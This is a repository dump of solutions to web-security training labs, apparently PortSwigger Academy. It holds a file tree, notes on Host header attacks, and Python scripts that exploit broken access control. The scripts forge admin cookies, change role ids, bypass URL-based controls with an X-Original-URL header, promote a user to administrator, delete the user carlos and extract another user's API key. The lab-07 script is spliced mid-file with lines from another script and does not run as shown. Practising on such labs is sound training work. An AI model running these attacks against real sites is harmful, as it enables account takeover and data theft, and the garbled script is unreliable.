├── HTTP-Host-header-attacks ├── lab-01 │ └── notes.txt ├── lab-02 │ └── notes.txt ├── lab-03 │ └── notes.txt ├── lab-04 │ └── notes.txt ├── lab-05 │ └── notes.txt ├── lab-06 │ └── notes.txt ├── lab-07 │ └── notes.txt └── theory │ └── Host Header Attacks Complete Guide Theory Video Slides.pdf ├── README.md ├── broken-access-control ├── lab-01 │ ├── access-control-lab-01.py │ └── notes.txt ├── lab-02 │ ├── access-control-lab-02.py │ └── notes.txt ├── lab-03 │ ├── access-control-lab-03.py │ └── notes.txt ├── lab-04 │ ├── access-control-lab-04.py │ └── notes.txt ├── lab-05 │ ├── access-control-lab-05.py │ └── notes.txt ├── lab-06 │ ├── access-control-lab-06.py │ └── notes.txt ├── lab-07 │ ├── access-control-lab-07.py │ └── notes.txt ├── lab-08 │ ├── access-control-lab-08.py │ └── notes.txt ├── lab-09 │ ├── access-control-lab-09.py │ └── notes.txt ├── lab-10 │ ├── access-control-lab-10.py │ └── notes.txt ├── lab-11 │ ├── access-control-lab-11.py │ └── notes.txt ├── lab-12 │ ├── access-control-lab-12.py │ └── notes.txt ├── lab-13 │ ├── access-control-lab-13.py │ └── notes.txt └── theory │ └── Broken Access Control Complete Guide Theory Video Slides.pdf ├── broken-authentication ├── lab-01 │ └── notes.txt ├── lab-02 │ ├── authentication-lab-02.py │ └── notes.txt ├── lab-03 │ ├── authentication-lab-03.py │ └── notes.txt ├── lab-04 │ └── notes.txt ├── lab-05 │ └── notes.txt ├── lab-06 │ ├── authentication-lab-06-usernames.py │ └── notes.txt ├── lab-07 │ └── notes.txt ├── lab-08 │ └── notes.txt ├── lab-09 │ ├── authentication-lab-09.py │ └── notes.txt ├── lab-10 │ └── notes.txt ├── lab-11 │ └── notes.txt ├── lab-12 │ ├── authentication-lab-12.py │ └── notes.txt ├── lab-13 │ ├── authentication-lab-13.py │ ├── convert-pwd-format.py │ └── notes.txt ├── lab-14 │ └── notes.txt └── theory │ └── Authentication Vulnerabilities Complete Guide Theory Video Slides.pdf ├── business-logic-vulnerabilities ├── lab-01 │ ├── business-logic-flaw-lab-01.py │ └── notes.txt ├── lab-02 │ ├── business-logic-flaw-lab-02.py │ └── notes.txt ├── lab-03 │ └── notes.txt ├── lab-04 │ ├── business-logic-flaw-lab-04.py │ └── notes.txt ├── lab-05 │ └── notes.txt ├── lab-06 │ └── notes.txt ├── lab-07 │ ├── business-logic-flaw-lab-07.py │ └── notes.txt ├── lab-08 │ ├── business-logic-flaw-lab-08.py │ └── notes.txt ├── lab-09 │ ├── business-logic-flaw-lab-09.py │ └── notes.txt ├── lab-10 │ ├── business-logic-flaw-lab-10.py │ └── notes.txt ├── lab-11 │ └── notes.txt └── theory │ └── Business Logic Vulnerabilities - Complete Guide.pdf ├── clickjacking ├── lab-01 │ ├── clickjacking-lab-01.html │ └── notes.txt ├── lab-02 │ ├── clickjacking-lab-02.html │ └── notes.txt ├── lab-03 │ ├── clickjacking-lab-03.html │ └── notes.txt ├── lab-04 │ ├── clickjacking-lab-04.html │ └── notes.txt ├── lab-05 │ ├── clickjacking-lab-05.html │ └── notes.txt └── theory │ └── Clickjacking Complete Guide Theory Video Slides.pdf ├── command-injection ├── lab-01 │ ├── command-injection-lab-01.py │ └── notes.txt ├── lab-02 │ ├── command-injection-lab-02.py │ └── notes.txt ├── lab-03 │ ├── command-injection-lab-03.py │ └── notes.txt ├── lab-04 │ └── notes.txt ├── lab-05 │ └── notes.txt └── theory │ └── Command Injection Complete Guide Theory Video Slides.pdf ├── cors ├── lab-01 │ ├── cors-lab-01.html │ └── notes.txt ├── lab-02 │ ├── cors-lab-02.html │ └── notes.txt ├── lab-03 │ ├── cors-lab-03.html │ └── notes.txt ├── lab-04 │ ├── cors-lab-04-step-1.html │ ├── cors-lab-04-step-2.html │ ├── cors-lab-04-step-3.html │ ├── cors-lab-04-step-4.html │ ├── notes.txt │ ├── request-1.html │ └── request-2.html └── theory │ └── CORS Complete Guide Theory Video Slides.pdf ├── csrf ├── lab-01 │ ├── csrf-lab01.html │ └── notes.txt ├── lab-02 │ ├── csrf-lab-02.html │ └── notes.txt ├── lab-03 │ ├── csrf-lab-03.html │ └── notes.txt ├── lab-04 │ ├── csrf-lab-04.html │ └── notes.txt ├── lab-05 │ ├── csrf-lab-05.html │ └── notes.txt ├── lab-06 │ ├── csrf-lab-06.html │ └── notes.txt ├── lab-07 │ ├── csrf-lab-07.html │ └── notes.txt ├── lab-08 │ ├── csrf-lab-08.html │ └── notes.txt ├── lab-09 │ └── notes.txt ├── lab-10 │ └── notes.txt ├── lab-11 │ └── notes.txt ├── lab-12 │ └── notes.txt └── theory │ └── CSRF Complete Guide Theory Video Slides.pdf ├── directory-traversal ├── lab-01 │ ├── directory-traversal-lab-01.py │ └── notes.txt ├── lab-02 │ ├── directory-traversal-lab-02.py │ └── notes.txt ├── lab-03 │ ├── directory-traversal-lab-03.py │ └── notes.txt ├── lab-04 │ ├── directory-traversal-lab-04.py │ └── notes.txt ├── lab-05 │ ├── directory-traversal-lab-05.py │ └── notes.txt ├── lab-06 │ ├── directory-traversal-lab-06.py │ └── notes.txt └── theory │ └── Directory Traversal Complete Guide Theory Video Slides.pdf ├── dom-based-vulnerabilities ├── lab-01 │ └── notes.txt ├── lab-02 │ └── notes.txt ├── lab-03 │ └── notes.txt ├── lab-04 │ └── notes.txt ├── lab-05 │ └── notes.txt ├── lab-06 │ ├── notes.txt │ └── test.html ├── lab-07 │ └── notes.txt └── theory │ └── DOM-Based Vulnerabilities Complete Guide Theory Video Slides.pdf ├── file-upload-vulnerabilities ├── lab-01 │ ├── file-upload-lab-01.py │ ├── notes.txt │ └── test.php ├── lab-02 │ ├── file-upload-lab-02.py │ ├── notes.txt │ └── test.php ├── lab-03 │ ├── file-upload-lab-03.py │ ├── notes.txt │ └── test.php ├── lab-04 │ ├── .htaccess │ ├── file-uplod-lab-04.py │ ├── notes.txt │ └── test.test ├── lab-05 │ ├── file-upload-lab-05.py │ ├── notes.txt │ └── test.php ├── lab-06 │ ├── notes.txt │ └── polygot.php ├── lab-07 │ ├── notes.txt │ └── test.php └── theory │ └── File Upload Complete Guide Theory Video Slides.pdf ├── information-disclosure ├── lab-01 │ ├── information-disclosure-lab-01.py │ └── notes.txt ├── lab-02 │ ├── information-disclosure-lab-02.py │ └── notes.txt ├── lab-03 │ ├── information-disclosure-lab-03.py │ └── notes.txt ├── lab-04 │ ├── information-disclosure-lab-04.py │ └── notes.txt ├── lab-05 │ └── notes.txt └── theory │ └── Information Disclosure Complete Guide Theory Video Slides.pdf ├── introduction-slides.pptx ├── jwt-attacks ├── lab-01 │ ├── jwt-attacks-lab-01.py │ └── notes.txt ├── lab-02 │ ├── jwt-attacks-lab-02.py │ └── notes.txt ├── lab-03 │ ├── jwt.secrets.list │ └── notes.txt ├── lab-04 │ └── notes.txt ├── lab-05 │ └── notes.txt ├── lab-06 │ └── notes.txt ├── lab-07 │ └── notes.txt ├── lab-08 │ └── notes.txt └── theory │ └── JWT Attacks Complete Guide Theory Video Slides.pdf ├── sql-injection ├── lab-01 │ ├── notes.txt │ └── sqli-lab-01.py ├── lab-02 │ ├── notes.txt │ ├── sqli-lab-02-without-proxy.py │ └── sqli-lab-02.py ├── lab-03 │ ├── notes.txt │ └── sqli-lab-03.py ├── lab-04 │ ├── notes.txt │ └── sqli-lab-04.py ├── lab-05 │ ├── notes.txt │ └── sqli-lab-05.py ├── lab-06 │ ├── notes.txt │ └── sqli-lab-06.py ├── lab-07 │ ├── notes.txt │ └── sqli-lab-07.py ├── lab-08 │ ├── notes.txt │ └── sqli-lab-08.py ├── lab-09 │ ├── notes.txt │ └── sqli-lab-09.py ├── lab-10 │ ├── notes.txt │ └── sqli-lab-10.py ├── lab-11 │ ├── notes.txt │ └── sqli-lab-11.py ├── lab-12 │ ├── notes.txt │ └── sqli-lab-12.py ├── lab-13 │ ├── notes.txt │ └── sqli-lab-13.py ├── lab-14 │ ├── notes.txt │ └── sqli-lab-14.py ├── lab-15 │ └── notes.txt ├── lab-16 │ └── notes.txt ├── lab-17 │ └── notes.txt ├── lab-18 │ └── notes.txt └── theory │ └── SQL Injection Complete Guide.pdf ├── ssrf ├── lab-01 │ ├── notes.txt │ └── ssrf-lab-01.py ├── lab-02 │ ├── notes.txt │ └── ssrf-lab-02.py ├── lab-03 │ ├── notes.txt │ └── ssrf-lab-03.py ├── lab-04 │ ├── notes.txt │ └── ssrf-lab-04.py ├── lab-05 │ ├── notes.txt │ └── ssrf-lab-05.py ├── lab-06 │ └── notes.txt ├── lab-07 │ └── notes.txt └── theory │ └── SSRF Complete Guide Theory Video Slides.pdf ├── websockets-vulnerabilities ├── lab-01 │ └── notes.txt ├── lab-02 │ └── notes.txt ├── lab-03 │ └── notes.txt └── theory │ └── WebSockets Vulnerabilities Complete Guide Theory Video Slides.pdf ├── xss ├── lab-01 │ └── notes.txt ├── lab-02 │ └── notes.txt ├── lab-03 │ └── notes.txt ├── lab-04 │ └── notes.txt ├── lab-05 │ └── notes.txt ├── lab-06 │ └── notes.txt ├── lab-07 │ └── notes.txt ├── lab-08 │ └── notes.txt ├── lab-09 │ └── notes.txt ├── lab-10 │ └── notes.txt ├── lab-11 │ └── notes.txt ├── lab-12 │ └── notes.txt ├── lab-13 │ └── notes.txt ├── lab-14 │ └── notes.txt ├── lab-15 │ └── notes.txt ├── lab-16 │ └── notes.txt ├── lab-17 │ └── notes.txt ├── lab-18 │ └── notes.txt ├── lab-19 │ └── notes.txt ├── lab-20 │ └── notes.txt ├── lab-21 │ └── notes.txt ├── lab-22 │ └── notes.txt ├── lab-23 │ └── notes.txt ├── lab-24 │ └── notes.txt └── theory │ └── XSS Complete Guide Theory Video Slides.pdf └── xxe-injection ├── lab-01 ├── notes.txt └── xxe-injection-lab-01.py ├── lab-02 ├── notes.txt └── xxe-injection-lab-02.py ├── lab-03 └── notes.txt ├── lab-04 └── notes.txt ├── lab-05 └── notes.txt ├── lab-06 └── notes.txt ├── lab-07 ├── notes.txt └── xxe-injection-lab-07.py ├── lab-08 ├── notes.txt ├── test.svg └── xxe-injection-lab-08.py ├── lab-09 ├── notes.txt └── xxe-injection-lab-09.py └── theory └── XXE Injection Complete Guide Theory Video Slides.pdf /HTTP-Host-header-attacks/lab-01/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #1 - Basic password reset poisoning 2 | 3 | Vulnerable parameter - password reset functionality. 4 | 5 | Goal - Perform a password reset poisoning attack to compromise Carlos's account. 6 | 7 | creds - wiener:peter 8 | 9 | Analysis: 10 | -------------------------------------------------------------------------------- /HTTP-Host-header-attacks/lab-02/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #2 – Host header authentication bypass 2 | 3 | Vulnerable parameter - Host header. 4 | 5 | Goal - Access the admin panel and delete the carlos user. 6 | 7 | creds - N/A 8 | 9 | Analysis: -------------------------------------------------------------------------------- /HTTP-Host-header-attacks/lab-03/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #3 – Web cache poisoning via ambiguous requests 2 | 3 | Vulnerable parameter - Host header 4 | 5 | Goal - Perform a web cache poisoning attack that alerts on the victim's cookie 6 | 7 | Analysis: 8 | 9 | User Cache Web Server 10 | Attacker ----------------------> Homepage 11 | <---------------------- 12 | User 2 ----------> Cached Homepage 13 | <---------- 14 | 15 | Three steps to construct a web cache poisoning attack: 16 | 1. Identify and evaluate unkeyed inputs. 17 | 2. Elicit a harmful response from the backend server. 18 | 3. Get the response cached. 19 | 20 | 21 | -------------------------------------------------------------------------------- /HTTP-Host-header-attacks/lab-04/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #4 – Routing-based SSRF 2 | 3 | Vulnerable parameter - Host header 4 | 5 | Goal - Exploit the host header injection to perform an SSRF attack to access the admin panel and delete the user carlos. 6 | 7 | creds - N/A 8 | 9 | Analysis: 10 | 11 | Application client -> | Application server, Server 1, Server 2, Server 3, ... | 12 | 13 | 222q6kkf0u3w9pjwbl0f20f6ux0ooec3.oastify.com -------------------------------------------------------------------------------- /HTTP-Host-header-attacks/lab-05/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #5 – SSRF via flawed request parsing 2 | 3 | Vulnerable parameter - Host header. 4 | 5 | Goal - Exploit the host header injection to gain access to an internal admin panel and delete the carlos user. 6 | 7 | creds - N/A 8 | 9 | Analysis: 10 | -------------------------------------------------------------------------------- /HTTP-Host-header-attacks/lab-06/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #6 – Host validation bypass via connection state attack 2 | 3 | Vulnerable parameter - Host header 4 | 5 | Goal - Exploit the host header injection in order to perform an SSRF attack and access an internal admin panel to delete the carlos user. 6 | 7 | creds - N/A 8 | 9 | Analysis: 10 | 11 | 12 | 1 2 3 4 5 6 -------------------------------------------------------------------------------- /HTTP-Host-header-attacks/lab-07/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #7 – Password reset poisoning via dangling markup 2 | 3 | Vulnerable parameter - Password reset functionality 4 | 5 | Goal - Perform password reset poisoing via dangling markup. 6 | 7 | creds - wiener:peter 8 | 9 | Analysis: 10 | 11 | 12 | click here to login with your new password: IrXeyW3cTi

Thanks,
Support team

This email has been scanned by the MacCarthy Email Security service 13 | 14 | /?/login'>click+here+to+login+with+your+new+password:+NebdDO1053

Thanks,
Support+team

This+email+has+been+scanned+by+the+MacCarthy+Email+Security+service -------------------------------------------------------------------------------- /HTTP-Host-header-attacks/theory/Host Header Attacks Complete Guide Theory Video Slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rkhal101/Web-Security-Academy-Series/ad800b5dc2649815692b90b892dee474f82701f8/HTTP-Host-header-attacks/theory/Host Header Attacks Complete Guide Theory Video Slides.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Web-Security-Academy-Series 2 | 3 | TBA 4 | -------------------------------------------------------------------------------- /broken-access-control/lab-01/access-control-lab-01.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | 6 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 7 | 8 | def delete_user(url): 9 | admin_panel_url = url + '/administrator-panel' 10 | r = requests.get(admin_panel_url, verify=False, proxies=proxies) 11 | if r.status_code == 200: 12 | print('(+) Found the administrator panel!') 13 | print('(+) Deleting Carlos user...') 14 | delete_carlos_url = admin_panel_url + '/delete?username=carlos' 15 | r = requests.get(delete_carlos_url, verify=False, proxies=proxies) 16 | if r.status_code == 200: 17 | print('(+) Carlos user delete!') 18 | 19 | else: 20 | print('(-) Could not delete user.') 21 | else: 22 | print('(-) Administrator panel not found.') 23 | print('(-) Exiting the script...') 24 | 25 | def main(): 26 | if len(sys.argv) != 2: 27 | print("(+) Usage: %s " % sys.argv[0]) 28 | print("(+) Example: %s www.example.com" % sys.argv[0]) 29 | sys.exit(-1) 30 | 31 | url = sys.argv[1] 32 | print("(+) Finding admin panel...") 33 | delete_user(url) 34 | 35 | 36 | if __name__ == "__main__": 37 | main() -------------------------------------------------------------------------------- /broken-access-control/lab-01/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #1 - Unprotected admin function 2 | 3 | Target Goal - Find the admin panel and delete the user carlos 4 | 5 | Analysis: 6 | -------------------------------------------------------------------------------- /broken-access-control/lab-02/access-control-lab-02.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | import re 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 10 | 11 | def delete_user(url): 12 | 13 | r = requests.get(url, verify=False, proxies=proxies) 14 | 15 | # Retrieve session cookie 16 | session_cookie = r.cookies.get_dict().get('session') 17 | 18 | # Retrieve the admin path 19 | soup = BeautifulSoup(r.text, 'lxml') 20 | admin_instances = soup.find(text=re.compile("/admin-")) 21 | admin_path = re.search("href', '(.*)'", admin_instances).group(1) 22 | 23 | # Delete Carlos user 24 | cookies = {'session': session_cookie} 25 | delete_carlos_url = url + admin_path + '/delete?username=carlos' 26 | r = requests.get(delete_carlos_url, cookies=cookies, verify=False, proxies=proxies) 27 | if r.status_code == 200: 28 | print('(+) Carlos user delete!') 29 | else: 30 | print('(-) Deletion failed.') 31 | print('(-) Exiting script...') 32 | sys.exit(-1) 33 | 34 | def main(): 35 | if len(sys.argv) != 2: 36 | print("(+) Usage: %s " % sys.argv[0]) 37 | print("(+) Example: %s www.example.com" % sys.argv[0]) 38 | sys.exit(-1) 39 | 40 | url = sys.argv[1] 41 | print("(+) Deleting Carlos user...") 42 | delete_user(url) 43 | 44 | if __name__ == "__main__": 45 | main() -------------------------------------------------------------------------------- /broken-access-control/lab-02/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #2 - Unprotected admin functionality with unpredictable URL 2 | 3 | Target Goal - Find the admin panel and delete the user carlos. 4 | 5 | Analysis: 6 | -------------------------------------------------------------------------------- /broken-access-control/lab-03/access-control-lab-03.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 9 | 10 | def get_csrf_token(s, url): 11 | r = s.get(url, verify=False, proxies=proxies) 12 | soup = BeautifulSoup(r.text, 'html.parser') 13 | csrf = soup.find("input", {'name': 'csrf'})['value'] 14 | return csrf 15 | 16 | 17 | def delete_user(s, url): 18 | 19 | # get CSRF token from the login page 20 | login_url = url + "/login" 21 | csrf_token = get_csrf_token(s, login_url) 22 | 23 | #login as the wiener user 24 | data = {"csrf": csrf_token, 25 | "username": "wiener", 26 | "password": "peter"} 27 | 28 | r = s.post(login_url, data=data, verify=False, proxies=proxies) 29 | res = r.text 30 | if "Log out" in res: 31 | print("(+) Successfully logged in as the wiener user.") 32 | 33 | # NOTE - Made a small change to fix retrieving the session cookie 34 | my_account_url = url + "/my-account" 35 | r = s.get(my_account_url, verify=False, proxies=proxies) 36 | session_cookie = s.cookies.get_dict().get('session') 37 | 38 | # Visit the admin panel and delete the user carlos 39 | delete_carlos_user_url = url + "/admin/delete?username=carlos" 40 | cookies = {'Admin': 'true', 'session': session_cookie} 41 | r = requests.get(delete_carlos_user_url, cookies=cookies, verify=False, proxies=proxies) 42 | if r.status_code == 200: 43 | print('(+) Successfully deleted Carlos user.') 44 | else: 45 | print('(-) Failed to delete Carlos user.') 46 | sys.exit(-1) 47 | else: 48 | print("(-) Failed to login as the wiener user.") 49 | sys.exit(-1) 50 | 51 | def main(): 52 | if len(sys.argv) != 2: 53 | print("(+) Usage: %s " % sys.argv[0]) 54 | print("(+) Example: %s www.example.com" % sys.argv[0]) 55 | sys.exit(-1) 56 | 57 | s = requests.Session() 58 | url = sys.argv[1] 59 | delete_user(s, url) 60 | 61 | if __name__ == "__main__": 62 | main() 63 | -------------------------------------------------------------------------------- /broken-access-control/lab-03/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #3 - User role controlled by request parameter 2 | 3 | Target Goal - Access admin panel and use it to delete the user carlos. 4 | 5 | creds: wiener:peter 6 | 7 | Analysis: 8 | -------------------------------------------------------------------------------- /broken-access-control/lab-04/access-control-lab-04.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def delete_user(s, url): 10 | 11 | # login as the wiener user 12 | login_url = url + "/login" 13 | data_login = {"username": "wiener", "password": "peter"} 14 | r = s.post(login_url, data=data_login, verify=False, proxies=proxies) 15 | res = r.text 16 | if "Log out" in res: 17 | print("(+) Successfully logged in as the wiener user.") 18 | 19 | # Change the role id of the user 20 | change_email_url = url + "/my-account/change-email" 21 | data_role_change = {"email":"test@test.ca", "roleid": 2} 22 | r = s.post(change_email_url, json=data_role_change, verify=False, proxies=proxies) 23 | res = r.text 24 | if 'Admin' in res: 25 | print("(+) Successfully changed the role id.") 26 | 27 | # Delete the Carlos user 28 | delete_carlos_user_url = url + "/admin/delete?username=carlos" 29 | r = s.get(delete_carlos_user_url, verify=False, proxies=proxies) 30 | 31 | if r.status_code == 200: 32 | print("(+) Successfully delete Carlos user.") 33 | else: 34 | print("(-) Could not delete Carlos user.") 35 | sys.exit(-1) 36 | else: 37 | print("(-) Could not change the role id.") 38 | sys.exit(-1) 39 | else: 40 | print("(-) Could not login as the wiener user.") 41 | sys.exit(-1) 42 | 43 | 44 | 45 | def main(): 46 | if len(sys.argv) != 2: 47 | print("Usage: %s " % sys.argv[0]) 48 | print("Example: %s www.example.com" % sys.argv[0]) 49 | sys.exit(-1) 50 | 51 | s = requests.Session() 52 | url = sys.argv[1] 53 | delete_user(s, url) 54 | 55 | 56 | 57 | 58 | if __name__ == "__main__": 59 | main() -------------------------------------------------------------------------------- /broken-access-control/lab-04/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #4 - User role can be modified in user profile 2 | 3 | Target Goal - Access admin panel and use it to delete the user carlos. 4 | 5 | creds: wiener:peter 6 | 7 | Steps to script: 8 | 1. Login as the wiener user 9 | 2. Change the role id of the user to 2 10 | 3. Access the admin panel and delete the user -------------------------------------------------------------------------------- /broken-access-control/lab-05/access-control-lab-05.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def delete_user(s, url): 10 | 11 | delete_carlos_user_url = url + "/?username=carlos" 12 | headers = {"X-Original-URL": "/admin/delete"} 13 | r = s.get(delete_carlos_user_url, headers=headers, verify=False, proxies=proxies) 14 | 15 | # Verify if the user was deleted 16 | r = s.get(url, verify=False, proxies=proxies) 17 | res = r.text 18 | if "Congratulations, you solved the lab!" in res: 19 | print("(+) Successfully deleted Carlos user.") 20 | else: 21 | print("(-) Could not delete Carlos user.") 22 | 23 | def main(): 24 | if len(sys.argv) != 2: 25 | print("(+) Usage: %s " % sys.argv[0]) 26 | print("(+) Example: %s www.example.com" % sys.argv[0]) 27 | sys.exit(-1) 28 | 29 | s = requests.Session() 30 | url = sys.argv[1] 31 | delete_user(s, url) 32 | 33 | if __name__ == "__main__": 34 | main() -------------------------------------------------------------------------------- /broken-access-control/lab-05/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #5 - URL-based access control can be circumvented 2 | 3 | Target Goal - Access the admin panel and delete the Carlos user 4 | -------------------------------------------------------------------------------- /broken-access-control/lab-06/access-control-lab-06.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def promote_to_admin(s, url): 10 | 11 | # login as the wiener user 12 | login_url = url + "/login" 13 | data_login = {"username": "wiener", "password": "peter"} 14 | 15 | r = s.post(login_url, data=data_login, verify=False, proxies=proxies) 16 | res = r.text 17 | if "Log out" in res: 18 | print("(+) Successfully logged in as the wiener user.") 19 | 20 | # Exploit access control vulnerability to promote the user to admin 21 | admin_roles_url = url + "/admin-roles?username=wiener&action=upgrade" 22 | r = s.get(admin_roles_url, verify=False, proxies=proxies) 23 | res = r.text 24 | if "Admin panel" in res: 25 | print("(+) Successfully promoted the user to administrator.") 26 | else: 27 | print("(-) Could not promote the user to administrator.") 28 | sys.exit(-1) 29 | else: 30 | print("(-) Could not login as the wiener user.") 31 | sys.exit(-1) 32 | 33 | def main(): 34 | if len(sys.argv) != 2: 35 | print("(+) Usage: %s " % sys.argv[0]) 36 | print("(+) Example: %s www.example.com" % sys.argv[0]) 37 | sys.exit(-1) 38 | 39 | s = requests.Session() 40 | url = sys.argv[1] 41 | promote_to_admin(s, url) 42 | 43 | if __name__ == "__main__": 44 | main() -------------------------------------------------------------------------------- /broken-access-control/lab-06/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #6 - Method-based access control can be circumvented 2 | 3 | Target Goal - Promote user to become administrator 4 | 5 | creds: administrator:admin, wiener:peter 6 | 7 | Steps to exploit: 8 | -------------------------------------------------------------------------------- /broken-access-control/lab-07/access-control-lab-07.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | import re 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 10 | 11 | def get_csrf_token(s, url): 12 | 13 | r = s.get(url, verify=False, proxies=proxies) 14 | soup = BeautifulSoup(r.text, 'html.parser') 15 | csrf = soup.find("input", {'name': 'csrf'})['value'] 16 | return csrf 17 | 18 | 19 | def carlos_api_key(s, url): 20 | 21 | # Get CSRF token from login page 22 | login_url = url + "/login" 23 | csrf_token = get_csrf_token(s, login_url) 24 | 25 | # login as the wiener user 26 | print("(+) Logging in as the wiener user...") 27 | data_login = {"csrf": csrf_token, "username": "wiener", "password": "peter"} 28 | 29 | r = s.post(login_url, data=data_login, verify=False, proxies=proxies) 30 | res = r.text 31 | if "Log out" in res: 32 | print("(+) Successfully logged in as the wiener user.") 33 | 34 | # Exploit access control vulnerability and access the carlos account 35 | carlos_url = url + "/my-account?id=carlos" 36 | r = s.get(carlos_url, verify=False, proxies=proxies) 37 | res = r.text 38 | if "carlos" in res: 39 | print("(+) Successfully accessed Carlos's account!") 40 | print("(+) Retrieving the API key...") 41 | api_key = re.search("Your API Key is:(.*)", res).group(1) 42 | print('API key is:' + api_key.split('')[0]) 43 | else: 44 | print("(-) Could not access Carlos's account.") 45 | sys.exit(-1) 46 | else: 47 | print("(-) Could not login as the wiener user.") 48 | sys.exit(-1) 49 | 50 | def main(): 51 | if len(sys.argv) != 2: 52 | print("(+) Usage: %s ', res) 60 | print('API key is: ' + api_key[0]) 61 | else: 62 | print("(-) Could not access Carlos's account.") 63 | sys.exit(-1) 64 | else: 65 | print("(-) Could not login as the wiener user.") 66 | sys.exit(-1) 67 | 68 | def main(): 69 | if len(sys.argv) != 2: 70 | print("(+) Usage: %s " % sys.arv[0]) 71 | print("(+) Example: %s www.example.com" % sys.argv[0]) 72 | sys.exit(-1) 73 | 74 | s = requests.Session() 75 | url = sys.argv[1] 76 | carlos_api_key(s, url) 77 | 78 | 79 | if __name__ == "__main__": 80 | main() -------------------------------------------------------------------------------- /broken-access-control/lab-08/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #8 - User ID controlled by request parameter, with unpredictable user IDs 2 | 3 | Target Goal - Find the GUID for carlos and compromise his account 4 | 5 | creds: wiener:peter 6 | 7 | Steps to exploit: 8 | 9 | 1. Log into the wiener account 10 | 2. Loop through all the posts and identify which one is written by the carlos user 11 | 3. Extract the GUID 12 | 4. Access the Carlos user account 13 | 5. Extract the API key of Carlos. -------------------------------------------------------------------------------- /broken-access-control/lab-09/access-control-lab-09.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | import re 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 10 | 11 | def get_csrf_token(s, url): 12 | r = s.get(url, verify=False, proxies=proxies) 13 | soup = BeautifulSoup(r.text, 'html.parser') 14 | csrf = soup.find("input", {'name': 'csrf'})['value'] 15 | return csrf 16 | 17 | def carlos_api_key(s, url): 18 | 19 | # Get CSRF token from the login page 20 | login_url = url + "/login" 21 | csrf_token = get_csrf_token(s, login_url) 22 | 23 | # Login as the wiener user 24 | print("(+) Logging in as the wiener user...") 25 | data_login = {"username": "wiener", "password": "peter", "csrf": csrf_token} 26 | 27 | r = s.post(login_url, data=data_login, verify=False, proxies=proxies) 28 | res = r.text 29 | if "Log out" in res: 30 | print("(+) Successfully logged in as the wiener user.") 31 | 32 | # Access the Carlos account 33 | print("(+) Attempting to exploit access control vulnerability...") 34 | carlos_account_url = url + "/my-account?id=carlos" 35 | r = s.get(carlos_account_url, allow_redirects=False, verify=False, proxies=proxies) 36 | res = r.text 37 | if "carlos" in res: 38 | print("(+) Retrieving API key...") 39 | api_key = re.findall(r'Your API Key is:(.*)\<\/div>', res) 40 | print('API key is: ' + api_key[0]) 41 | else: 42 | print("(-) Could not exploit access control vulnerability.") 43 | sys.exit(-1) 44 | else: 45 | print("(-) Could not login as the wiener user.") 46 | sys.exit(-1) 47 | 48 | def main(): 49 | if len(sys.argv) != 2: 50 | print("(+) Usage: %s " % sys.argv[0]) 51 | print("(+) Example: %s www.example.com" % sys.argv[0]) 52 | sys.exit(-1) 53 | 54 | s = requests.Session() 55 | url = sys.argv[1] 56 | carlos_api_key(s, url) 57 | 58 | 59 | if __name__ == "__main__": 60 | main() -------------------------------------------------------------------------------- /broken-access-control/lab-09/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #9 - User ID controlled by request parameter with data leakage in redirect 2 | 3 | Target Goal - Obtain the API key for the carlos user. 4 | 5 | creds: wiener:peter 6 | 7 | Steps to exploit: -------------------------------------------------------------------------------- /broken-access-control/lab-10/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #10 - User ID controlled by request parameter with password disclosure 2 | 3 